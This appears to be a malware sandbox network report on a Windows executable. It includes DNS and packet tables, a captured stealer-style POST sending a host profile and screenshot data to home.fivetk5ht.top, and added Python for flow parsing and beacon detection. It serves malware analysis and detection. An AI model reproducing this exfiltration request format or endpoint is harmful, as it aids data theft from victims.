                                                          Dec 20, 2024 16:35:29.104441881 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104574919 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104585886 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.104707003 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.105138063 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.105148077 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.105423927 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109729052 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109776020 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109796047 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109821081 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109908104 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109920979 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109930038 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109941006 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.109966040 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.109997988 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110099077 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110110044 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110120058 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110131979 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110137939 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110168934 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110183001 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110240936 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110251904 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110294104 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110411882 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110423088 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110435009 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110444069 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110455036 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.110676050 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110687017 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110698938 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110707998 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110716105 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110773087 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110783100 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110793114 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110846996 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110858917 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110869884 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.110878944 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111088991 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111099958 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111108065 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111118078 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111125946 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111267090 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111278057 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111288071 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111296892 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111306906 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111454964 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111464977 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111473083 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111484051 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111563921 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.111701965 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.162126064 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.164953947 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.165004969 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.165196896 CET4970880192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:29.223799944 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.223865986 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.223949909 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224133015 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224205971 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224242926 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224262953 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224275112 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.224385023 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225758076 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225822926 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225889921 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225900888 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225951910 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225963116 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.225972891 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226038933 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226049900 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226090908 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226102114 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226114988 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226172924 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226183891 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226236105 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226247072 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226257086 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226311922 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226324081 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226336002 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226437092 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226449966 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226459980 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226469994 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226509094 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.226521015 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230175018 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230221033 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230231047 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230293989 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230393887 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230422974 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230514050 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230525017 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230582952 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230604887 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230686903 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230699062 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230768919 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230865002 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230925083 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.230935097 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231054068 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231092930 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231156111 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231167078 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231240034 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231259108 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231338978 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231349945 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231420994 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231566906 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231592894 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.231920958 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.285818100 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.286050081 CET8049708185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:29.941343069 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:30.060920954 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:30.061083078 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:30.061448097 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:30.180926085 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:31.337925911 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:31.338026047 CET8049709185.121.15.192192.168.2.9
                                                          Dec 20, 2024 16:35:31.338299990 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:31.338567019 CET4970980192.168.2.9185.121.15.192
                                                          Dec 20, 2024 16:35:31.458056927 CET8049709185.121.15.192192.168.2.9
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 20, 2024 16:35:23.787506104 CET  63776        53         192.168.2.9      1.1.1.1
Dec 20, 2024 16:35:23.787606955 CET  63776        53         192.168.2.9      1.1.1.1
Dec 20, 2024 16:35:24.075175047 CET  53           63776      1.1.1.1          192.168.2.9
Dec 20, 2024 16:35:24.076867104 CET  53           63776      1.1.1.1          192.168.2.9
Dec 20, 2024 16:35:27.310153008 CET  63779        53         192.168.2.9      1.1.1.1
Dec 20, 2024 16:35:27.310282946 CET  63779        53         192.168.2.9      1.1.1.1
Dec 20, 2024 16:35:27.447179079 CET  53           63779      1.1.1.1          192.168.2.9
Dec 20, 2024 16:35:27.750389099 CET  53           63779      1.1.1.1          192.168.2.9
Dec 20, 2024 16:35:29.802408934 CET  63781        53         192.168.2.9      1.1.1.1
Dec 20, 2024 16:35:29.802460909 CET  63781        53         192.168.2.9      1.1.1.1
Dec 20, 2024 16:35:29.940097094 CET  53           63781      1.1.1.1          192.168.2.9
Dec 20, 2024 16:35:29.940167904 CET  53           63781      1.1.1.1          192.168.2.9
Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
Dec 20, 2024 16:35:23.787506104 CET  192.168.2.9  1.1.1.1  0x73d     Standard query (0)  httpbin.org         A (IP address)  IN (0x0001)  false
Dec 20, 2024 16:35:23.787606955 CET  192.168.2.9  1.1.1.1  0xcfb9    Standard query (0)  httpbin.org         28 (AAAA)       IN (0x0001)  false
Dec 20, 2024 16:35:27.310153008 CET  192.168.2.9  1.1.1.1  0xe809    Standard query (0)  home.fivetk5ht.top  A (IP address)  IN (0x0001)  false
Dec 20, 2024 16:35:27.310282946 CET  192.168.2.9  1.1.1.1  0xcf63    Standard query (0)  home.fivetk5ht.top  28 (AAAA)       IN (0x0001)  false
Dec 20, 2024 16:35:29.802408934 CET  192.168.2.9  1.1.1.1  0xe838    Standard query (0)  home.fivetk5ht.top  A (IP address)  IN (0x0001)  false
Dec 20, 2024 16:35:29.802460909 CET  192.168.2.9  1.1.1.1  0xdc4b    Standard query (0)  home.fivetk5ht.top  28 (AAAA)       IN (0x0001)  false
Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
Dec 20, 2024 16:35:24.075175047 CET  1.1.1.1    192.168.2.9  0x73d     No error (0)  httpbin.org         -      98.85.100.80    A (IP address)  IN (0x0001)  false
Dec 20, 2024 16:35:24.075175047 CET  1.1.1.1    192.168.2.9  0x73d     No error (0)  httpbin.org         -      34.226.108.155  A (IP address)  IN (0x0001)  false
Dec 20, 2024 16:35:27.447179079 CET  1.1.1.1    192.168.2.9  0xe809    No error (0)  home.fivetk5ht.top  -      185.121.15.192  A (IP address)  IN (0x0001)  false
Dec 20, 2024 16:35:29.940097094 CET  1.1.1.1    192.168.2.9  0xe838    No error (0)  home.fivetk5ht.top  -      185.121.15.192  A (IP address)  IN (0x0001)  false
                                                          • httpbin.org
                                                          • home.fivetk5ht.top
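Joe Sandbox's text export runs the five fields of each packet row together after the timezone token (the raw form of a row above is, for example, `4970880192.168.2.9185.121.15.192`), which is ambiguous on its own: `4970880` reads as 49708/80 or 4970/880, and `192.168.2.9185.121.15.192` reads as 192.168.2.9 followed by 185.121.15.192 or as 192.168.2.91 followed by 85.121.15.192. The example below is added by the editor and is not part of the report. It recovers the columns by requiring the analysis host 192.168.2.9 on one side, an address from the DNS answers above (or the 1.1.1.1 resolver) on the other, and port 80 or 53 on one side, refuses to guess when more than one reading survives, then collapses the rows into flows and lists the remote endpoints with their resolved names as the network IOCs. The sample rows and endpoint lists are copied from the report; the three constraints are assumptions about this capture and would need adjusting for another one.

```python
"""Recover the columns of packet rows whose fields were run together, then collapse
them into flows.  Added example, not part of the Joe Sandbox report: the rows and
endpoint lists are copied from the report, the disambiguation rules are assumptions."""
from collections import Counter, defaultdict

# Constructed from the report: analysis host, resolver, and the DNS answers table.
LOCAL_HOST = "192.168.2.9"
RESOLVER = "1.1.1.1"
RESOLVED = {
    "185.121.15.192": "home.fivetk5ht.top",
    "98.85.100.80": "httpbin.org",
    "34.226.108.155": "httpbin.org",
}
KNOWN_REMOTE = frozenset(RESOLVED) | {RESOLVER}
SERVICE_PORTS = frozenset({80, 53})  # assumption: every flow has HTTP or DNS on one side

# Rows copied from the report's TCP and UDP tables, in their raw concatenated form.
SAMPLE_ROWS = [
    "Dec 20, 2024 16:35:28.983238935 CET4970880192.168.2.9185.121.15.192",
    "Dec 20, 2024 16:35:28.983273983 CET8049708185.121.15.192192.168.2.9",
    "Dec 20, 2024 16:35:29.941343069 CET4970980192.168.2.9185.121.15.192",
    "Dec 20, 2024 16:35:23.787506104 CET6377653192.168.2.91.1.1.1",
    "Dec 20, 2024 16:35:24.075175047 CET53637761.1.1.1192.168.2.9",
]


def _port_ok(s):
    """Decimal, no leading zero, fits a 16-bit port."""
    return s.isdigit() and not (len(s) > 1 and s[0] == "0") and int(s) <= 65535


def _ipv4_ok(s):
    parts = s.split(".")
    return len(parts) == 4 and all(_port_ok(p) and int(p) <= 255 for p in parts)


def _ip_splits(s):
    """Every way to cut a string into two syntactically valid IPv4 literals."""
    for k in range(7, len(s) - 6):  # an IPv4 literal is 7 to 15 characters long
        if _ipv4_ok(s[:k]) and _ipv4_ok(s[k:]):
            yield s[:k], s[k:]


def candidates(row, local_host=LOCAL_HOST, known_remote=KNOWN_REMOTE,
               service_ports=SERVICE_PORTS):
    """All readings of a row consistent with the known endpoints and service ports."""
    ts, sep, rest = row.rpartition(" CET")
    if not sep:
        raise ValueError(f"no timezone token in {row!r}")
    readings = []
    for i in range(1, 6):            # source port: 1 to 5 digits
        for j in range(1, 6):        # destination port: 1 to 5 digits
            sport, dport, ips = rest[:i], rest[i:i + j], rest[i + j:]
            if not (_port_ok(sport) and _port_ok(dport)):
                continue
            for sip, dip in _ip_splits(ips):
                remote = dip if sip == local_host else sip if dip == local_host else None
                if remote is None or remote not in known_remote:
                    continue
                if service_ports and int(sport) not in service_ports and int(dport) not in service_ports:
                    continue
                readings.append({"ts": ts, "sport": int(sport), "dport": int(dport),
                                 "sip": sip, "dip": dip})
    return readings


def parse_row(row, **constraints):
    """Return the single consistent reading; refuse rather than guess otherwise."""
    readings = candidates(row, **constraints)
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} readings for {row!r}: {readings}")
    return readings[0]


def summarise(rows, local_host=LOCAL_HOST):
    """Packets per direction for each flow, keyed (client, client port, server, server port)."""
    flows = defaultdict(Counter)
    for row in rows:
        p = parse_row(row, local_host=local_host)
        if p["sip"] == local_host:
            flows[(p["sip"], p["sport"], p["dip"], p["dport"])]["out"] += 1
        else:
            flows[(p["dip"], p["dport"], p["sip"], p["sport"])]["in"] += 1
    return dict(flows)


def remote_endpoints(flows):
    """(server IP, port, resolved name or None) per flow: the network IOCs of the capture."""
    return sorted({(srv, port, RESOLVED.get(srv)) for (_, _, srv, port) in flows})


if __name__ == "__main__":
    flows = summarise(SAMPLE_ROWS)
    for key, counts in flows.items():
        print(key, dict(counts))
    print(remote_endpoints(flows))
```

Dropping the service-port constraint (`candidates(row, service_ports=frozenset())`) leaves two readings for the first sample row, which is why `parse_row` raises instead of picking one; the same three constraints resolve every row of the TCP and UDP tables in this report.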
Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.9  49708        185.121.15.192  80                7696  C:\Users\user\Desktop\HZhObFuFNe.exe
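The POST that session 0 carries (shown in the data table that follows) has the shape of a stealer check-in rather than of browser traffic: a JSON body whose first keys are a host profile (public IP, time, CPU and RAM counts, drive sizes, display resolution, recent-file count, process list), no User-Agent header, a Content-Length of 444282 bytes streamed across many segments (12360, 4944, 2472 bytes and so on), and a request path made of random letters followed by a 10-digit number. The later chunks of the same body are JSON-escaped base64; decoding the chunk sent at 16:35:27.993349075 at the right alignment yields the JPEG Start-of-Scan marker (ff da 00 0c 03 01 00 02 11 03 11 00 3f 00), so an image, most likely a screenshot, rides along with the profile. The example below is added by the editor and is not part of the report or of the sample. It parses the reconstructed request, scores these traits, checks a constructed benign GET to httpbin.org against the same logic, and tests a body chunk for the JPEG marker. The request text is copied from the report with the body truncated, the benign request, the 100000-byte threshold and the three-trait cut-off are assumptions.

```python
"""Score an HTTP request for the beacon traits seen in the captured POST and check
whether a body chunk carries JPEG data.  Added example, not part of the Joe Sandbox
report or the sample: request text reconstructed from the report (body truncated),
benign request and thresholds are assumptions."""
import base64
import json
import re

# Reconstructed from the report's HTTP session table; the real body was 444282 bytes.
CAPTURED_POST = (
    "POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1\r\n"
    "Host: home.fivetk5ht.top\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 444282\r\n"
    "\r\n"
    '{ "ip": "8.46.123.189", "current_time": "1734708925", "Num_processor": 4, '
    '"Num_ram": 7, "drivers": [ { "name": "C:\\\\", "all": 223.0, "free": 168.0 } ], '
    '"Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, '
    '"processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }'
)

# One later chunk of the same POST body, copied from the report (JSON "\/" escapes kept).
LATER_CHUNK = (
    r"xEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5Ok"
    r"NERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaan"
    r"qKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6\/9oADAMB"
    r"AAIRAxEAPwDh6Kc\/3j+H8h"
)

# Constructed benign request to the other domain the sample resolved; must not fire.
BENIGN_GET = (
    "GET /get HTTP/1.1\r\n"
    "Host: httpbin.org\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n"
    "Accept: */*\r\n"
    "\r\n"
)

# Top-level keys of the captured profile, as they appear in the report.
PROFILE_KEYS = {"ip", "current_time", "Num_processor", "Num_ram", "drivers",
                "Num_displays", "resolution_x", "resolution_y", "recent_files", "processes"}
KEY_RE = re.compile(r'"([A-Za-z_]+)"\s*:')
JPEG_SOS = bytes.fromhex("ffda000c03010002110311003f00")  # Start-of-Scan, 3 components


def parse_request(raw):
    """Split a raw HTTP/1.1 request into method, target, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "headers": headers, "body": body}


def body_keys(body):
    """Top-level keys when the body parses; a key scan when the capture is truncated."""
    try:
        doc = json.loads(body)
        return set(doc) if isinstance(doc, dict) else set()
    except json.JSONDecodeError:
        return set(KEY_RE.findall(body))


def beacon_traits(raw, min_body=100_000):
    """Names of the check-in traits present in the request (empty for ordinary traffic)."""
    req = parse_request(raw)
    h = req["headers"]
    traits = []
    if "user-agent" not in h:
        traits.append("no User-Agent")
    if req["method"] == "POST" and h.get("content-type", "").startswith("application/json"):
        traits.append("JSON POST")
    if int(h.get("content-length", "0")) >= min_body:
        traits.append("body >= %d bytes" % min_body)
    if re.fullmatch(r"/[A-Za-z]{8,}\d{10}", req["target"]):
        traits.append("random-looking path ending in a 10-digit number")
    found = body_keys(req["body"]) & PROFILE_KEYS
    if len(found) >= 5:
        traits.append("host-profile keys: " + ", ".join(sorted(found)))
    return traits


def is_beacon(raw, threshold=3):
    return len(beacon_traits(raw)) >= threshold


def carries_jpeg(chunk):
    """True if a JSON-escaped base64 fragment decodes, at some alignment, to bytes that
    contain a JPEG Start-of-Scan marker.  The fragment begins mid-stream, so all four
    alignments are tried and the tail is trimmed to whole 4-character groups."""
    b64 = chunk.replace("\\/", "/")
    for offset in range(4):
        part = b64[offset:]
        part = part[: len(part) - len(part) % 4]
        if JPEG_SOS in base64.b64decode(part):
            return True
    return False


if __name__ == "__main__":
    print(beacon_traits(CAPTURED_POST), is_beacon(CAPTURED_POST))
    print(beacon_traits(BENIGN_GET), is_beacon(BENIGN_GET))
    print("JPEG in later chunk:", carries_jpeg(LATER_CHUNK))
```

Each trait on its own is weak (plenty of legitimate clients post JSON without a User-Agent), so the score is the combination; the host-profile key check is the one that ties the traffic to this family, and the body scan tolerates the truncation that sandbox captures always have.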
Timestamp                            Bytes transferred  Direction  Data
Dec 20, 2024 16:35:27.873132944 CET  12360              OUT        POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                          Host: home.fivetk5ht.top
                                                          Accept: */*
                                                          Content-Type: application/json
                                                          Content-Length: 444282
                                                          Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 39 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                          Data Ascii: { "ip": "8.46.123.189", "current_time": "1734708925", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 792 }, { "name": "svchost.exe", "pid": [TRUNCATED]
Dec 20, 2024 16:35:27.993349075 CET  4944               OUT        Data Raw: 78 45 45 42 53 45 78 42 68 4a 42 55 51 64 68 63 52 4d 69 4d 6f 45 49 46 45 4b 52 6f 62 48 42 43 53 4d 7a 55 76 41 56 59 6e 4c 52 43 68 59 6b 4e 4f 45 6c 38 52 63 59 47 52 6f 6d 4a 79 67 70 4b 6a 55 32 4e 7a 67 35 4f 6b 4e 45 52 55 5a 48 53 45 6c
                                                          Data Ascii: xEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6\/9oADAMBAAIRAxEAPwDh6Kc\/3j+H8h
Dec 20, 2024 16:35:27.993422031 CET  4944               OUT        Data Raw: 65 5a 38 36 5a 54 70 5c 2f 72 4d 5c 2f 35 36 66 68 51 48 38 74 59 74 6e 6d 66 75 34 73 65 5a 5c 2f 30 77 2b 31 66 35 5c 2f 6e 36 6d 67 36 43 74 5c 2f 45 6d 39 50 6b 5c 2f 35 61 70 4a 2b 5c 2f 67 2b 74 31 2b 58 34 66 70 51 33 2b 73 68 66 5c 2f 58
                                                          Data Ascii: eZ86ZTp\/rM\/56fhQH8tYtnmfu4seZ\/0w+1f5\/n6mg6Ct\/Em9Pk\/5apJ+\/g+t1+X4fpQ3+shf\/XH\/lrJ24\/z+tPjCRtv2SIlx+9I\/wBR\/wBuvv8Az9+1Mkz9wfJ+98r\/AEjr\/nP+TXQAz\/lpN\/B5cX\/LT9\/P\/n\/9XrRJ+73\/AL6X93+9h\/z+Xt9ehANrP\/rNnm\/uv3X+f\/r4B60\/\/Ym+TzP9b
